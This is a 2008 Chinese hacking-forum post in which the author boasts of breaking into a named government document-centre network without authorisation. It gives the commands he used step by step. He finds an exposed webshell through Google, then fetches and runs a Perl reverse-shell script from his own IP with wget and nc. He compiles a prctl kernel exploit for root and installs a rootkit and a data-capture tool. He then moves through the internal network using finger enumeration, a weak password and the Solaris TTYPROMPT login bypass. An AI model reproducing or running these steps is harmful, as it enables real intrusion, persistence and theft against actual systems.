http://www.wolfexp.net/forum/viewthread.php?tid=5275&extra=page%3D3

by cnbird[H.U.C]

    大家好，我是cnbird[H.U.C]。今天给大家带来的内容比较恐怖了，虽然是我自己觉得，但是相信大家看完了以后也会跟我有一样的感觉了。

今天的目标比较大了是国家科技图书文献中心，www.nstl.gov.cn如图1

   图片1.JPG (111.53 KB)

2008-7-22 13:34

它是国务院直接批准的一个虚拟的科技文献信息服务机构，成员单位包括中国科学院文献情报中心、工程技术图书馆（中国科学技术信息研究所、机械工

业信息研究院、冶金工业信息标准研究院、中国化工信息中心）、中国农业科学院图书馆、中国医学科学院图书馆。网上共建单位包括中国标准化研究院

和中国计量科学研究院。中心设办公室，负责科技文献信息资源共建共享工作的组织、协调与管理。如图2查看了一下IP地址，吓了我一跳，属于国家科委I

P范围。

    图片2.JPG (27.41 KB)

2008-7-22 13:34

好了，不吓唬大家了，我们又不搞破坏，我们入侵进去以后我们可以把漏洞帮它补上啊，没事的，只要不做坏事就不会有人来找你的。

Google搜出隐蔽的shell

首先用nmap扫描一下，我已经成习惯了，先看看开放什么端口和服务吧。Nmap –A –vv www.nstl.gov.cn –P0。因为nmap是基于ping的，如果ping有响

应就开始扫描，我们这里的主机不让ping，可能是有防火墙或者是路由器做了限制，所以我们加个参数-P0。如图3结果出来了，

   图片3.JPG (90.47 KB)

2008-7-22 13:34

哇是DEC Digital UNIX真有钱啊，佩服佩服，果然是国家机构。大概的看了看几个分站，找到了一个看似可以SQL注入的但是在NBSI和阿D中都是不能注入

的，可惜看来我的技术也就这水平了，试了N多方法都没有找到有漏洞的主机。这个时候我忽然灵光一现，会不会有什么前辈以前进来过啊，给我们留下过

webshell什么的也说不定啊，我们来到google.cn搜索，先搜索一下ASP的小马试试如图4

   图片4.JPG (105.2 KB)

2008-7-22 13:34

结果没有，继续继续，我们输入管理登陆 site:nstl.gov.cn如图5

    图片5.JPG (82.2 KB)

2008-7-22 13:34

有个webadmin，哇靠，没有密码的，直接进来了如图6。

   图片6.JPG (92.9 KB)

2008-7-22 13:34

真晕，直接拿到webshell了，得来全不费工夫，我们继续转了一下，发先了一个c99shell.php的木马，我比较喜欢这个，以下所有的操作就都在这个上面

进行了。如图7。

   图片7.JPG (66.61 KB)

2008-7-22 13:34

轻轻松松拿root权限

拿到了webshell以后我们查看一下服务器的版本，输入uname –a；id得到的版本为2.6.9的，这个版本的本地提权利用代码很多。

    图片8.JPG (20.82 KB)

2008-7-22 13:34

下面我就详细的来讲解一下如何拿到的root权限。首先我们查看一下perl是不是安装上了，因为我们需要用到comeback.pl这个反弹shell的小工具，如图

9，

    图片9.JPG (29.23 KB)

2008-7-22 13:34

perl安装上了，wget同时也安装上了，这下就好说了。我们在webshell里面输入wget 121.16.35.232/comeback.pl –P /tmp;perl /tmp/comeback.pl我把

2个命令结合到一起了这样可以节省版面。如图10

   图片10.JPG (43.07 KB)

2008-7-22 13:34

我们成功的下载并且执行了，具体的用法是这样的，首先得到本地的IP地址为121.16.35.232，如图11，

    图片11.JPG (45.16 KB)

2008-7-22 13:34

然后在本地也就是自己的机器里面输入

nc –vv –l –p 12345。最后我们在webshell里面执行perl /tmp/.code/comeback.pl 121.16.35.232 12345如图12，13

    图片12.JPG (40.8 KB)

2008-7-22 13:34

    图片13.JPG (60.78 KB)

2008-7-22 13:34

成功反弹回来本地shell。

下面的工作就是要提权了，我们从milw0rm.com下载现在非常流行的prctl漏洞利用程序。我们来看nsfocus.net怎么描述prtcl这个漏洞的吧。Linux Kerne

l是开放源码操作系统Linux所使用的内核。

Linux Kernel的prctl()调用在处理Core Dump时存在漏洞，本地攻击者可能利用此漏洞提升自己的权限。

prctl()调用允许未授权进程设置PR_SET_DUMPABLE=2，因此当发生段错误时产生的core文件将被root用户拥有。本地用户可以创建恶意程序，将core文件d

ump到正常情况下无权写入的目录中。这可能导致拒绝服务（磁盘耗尽）或获得root权限。

Nsfocus.net描述的地址为http://www.nsfocus.net/vulndb/9006，漏洞利用程序下载地址为http://www.milw0rm.com/exploits/2006到时候我会把用到的

代码全部打包的。如图14，

   图片14.JPG (35.76 KB)

2008-7-22 13:34

我们已经下载好了，直接编译吧，我们输入gcc prtcl2.c –o local –static –Wall如图15，

    图片15.JPG (61.63 KB)

2008-7-22 13:34

我们已经编译好了。我们输入./local等待大约有

2分钟的时候我们输入id，哇靠，你看看吧，这就成root了，太esay了吧。

   图片16.JPG (22.7 KB)

2008-7-22 13:34

哈哈已经拿到root了，赶紧下载了一个Rootkit，具体的文章请参考黑客防线第八期的Linux后门系列--由浅入深sk13完全分析。这里就不详细的讲解了。

同时我们安装了捕获数据的sebek这个软件，以后我会跟大家详细讲解如何使用sebek捕获数据的。

扩大战果

到这里也许你就认为结束了，但是我认为这是一个开始而已。我们输入ifconfig –all查看一下ip地址，如图17

    图片17.JPG (84.29 KB)

2008-7-22 13:34

我们得到了这台服务器的IP地址为168.160.1.114，那么我们就来看看这个IP段到底有多少台机器吧。我们输入nmap，呵呵这台机器没想到自带，不用我

费劲安装了，我们输入nmap –sP 168.160.1.0-255  如图18，

    图片18.JPG (104.41 KB)

2008-7-22 13:34

我们得到了大量的存活主机。果然是国家投资啊，真有钱，SUN Microsystems的机器有4台，cisco路由器有5台，防火墙2个，windows

操作系统的一台，Alteon Networks3台，未知的有N台。这个网络可真庞大啊。我们先来用nmap扫描扫描SUN Microsystems的机器试试吧，IP地址为168.16

0.1.101哇靠，开放的端口真不少，如图19。

    图片19.JPG (112.87 KB)

2008-7-22 13:34

貌似我又回到了初学黑客技术的时候了。操作系统为 Sun Solaris 7 (SPARC)开放了79的端口。我们来试试用户列表吧，我们输入finger 0@168.160.1.10

1呵呵得到了不少的用户列表，

   图片20.JPG (68.62 KB)

2008-7-22 13:34

有trip，zhuxh，chychao，fengc，我们用N年前的老技术看看有没有弱口令吧，哇靠，还真让我找到了一个fengc密码fengc，直接登陆上去，如图21，

    图片21.JPG (43.47 KB)

2008-7-22 13:34

可惜是普通用户权限，没有安装gcc，不能用本地的exp提权漏洞了。没事的，我们知道2000年的时候sun os操作系统出现了N多的RPC漏洞，都是能直接拿r

oot权限的，不会2000年的漏洞现在都有吧。首先介绍一下sunos 的rpc机制，远程过程调用（RPC）是一个协议，程序可以使用这个协议请求网络中另一台

计算机上某程序的服务而不需知道网络细节。（过程调用有时也称作函数调用，或子例行程序调用。）RPC使用client/server模型。请求程序是client，

而服务提供程序则为server。就像一般的本地过程调用一样，RPC是一个同步操作，直到远程过程结果返回请求程序才可以挂起。尽管如此，使用轻质进程

或线程时，它们共享同一地址空间，是允许多个RPC并发执行的。这里就简单的讲解一下，大家想了解具体的细节请参考google。

RPC监听的端口是111，我们可以利用系统自带的命令rpcinfo来查看一下Sun操作系统开了什么RPC服务，因为RPC服务有很多都有漏洞的，开了不少远程RPC

的。如图22，

   图片22.JPG (66.15 KB)

2008-7-22 13:34

我把有可能有漏洞的都画出来了。提示：具体的漏洞代码大家可以来这里下载http://www.linux.com.cn/hack.co.za/exploits/daemon/rpc/

index.html 我们试了几个如图23，

    图片23.JPG (24.57 KB)

2008-7-22 13:34

果然不是吃素的，漏洞都补上了。但是没有关系的，因为Sunos操作系统的漏洞太多了。

我们知道sunos操作系统的/bin/login 无需任何身份验证即可远程非法登录，漏洞描述Solaris 2.6, 7, 和8的 /bin/login 存在一个漏洞，可以通过环境变量TT

YPROMPT绕过其验证。 利用此漏洞进行的攻击并不要求远程攻击者编译任何的攻击代码，只要求在telnet里将环境变量TTYPROMPT简单定义成长度为6的字符串，然后

一旦连接上远程主机，只要输入用户名，后面紧跟64个"c"和一个字面上的回车"\n"，即可以无需任何口令验证直接登陆到系统上。而且如果系统设置允许root用户远

程登陆，将可以以root用户登陆，获得其控制权限。 需要注意的是，这并不是一个新的安全漏洞，它其实是System V Login 缓冲区溢出漏洞的另外一种利用方法

。由于telnetd存在一个潜在的安全隐患：接受远程客户端传递过来的TTYPROMPT变量，并将其传递给/bin/login程序。当攻击者远程或者本地修改传递给login的TT

YPROMPT变量时，将导致在发生“System V系统Login远程缓冲区溢出漏洞”时，可以覆盖一个与认证状态有关的重要变量，导致无需身份认证即可登录。
     
好了，我们从milw0rm.com上下载了漏洞利用代码下载地址为http://www.milw0rm.com/exploits/716，我们把下载下来的代码编译，如图24，

    图片24.JPG (84.62 KB)

2008-7-22 13:34

这里我已经编译好了，用的命令是gcc telnet2.c –o telnet就可以了，我们输入./telnet看一下如何使用吧。如图25，

   图片25.JPG (29.37 KB)

2008-7-22 13:34

我们知道了以后，我们直接输入./telnet –h 168.160.1.101如图26，

    图片26.JPG (53.82 KB)

2008-7-22 13:34

哇，我们直接拿到了168.160.1.101的root权限了。用同样的方法，我也拿到了其他的3个Sunos的系统root权限，如图27。

   图片27.JPG (37.58 KB)

2008-7-22 13:34

总   结

       到这里我就不想继续的入侵下去了，一方面是因为害怕，另外一方面是因为内网的漏洞太多了，还有2台mysql密码为空，当然了外网是不能访问

的。因为cisco做了限制的原因。
     
     其实我入侵进去也是运气的成分，首先利用google.cn搜索到webshell->拿到本地的root权限->用nmap扫描出存活主机->继续渗透->成功拿到4台suno

s操作系统root权限。
      
     其实入侵的过程中还有不足的地方，就是没有成功的拿到cisco权限，因为我拿到了sunos的root权限也是不能远程登陆的，还要利用这台Linux的机

器作跳板再进入到其他的机器。显然很麻烦，现在我正在学习cisco的入侵方法，等有研究成果了第一个拿出来发到黑防上。希望大家多关注黑防。886。
原文链接：http://www.guanwei.org.cn/bbs/viewthread.php?tid=396&extra=page%3D1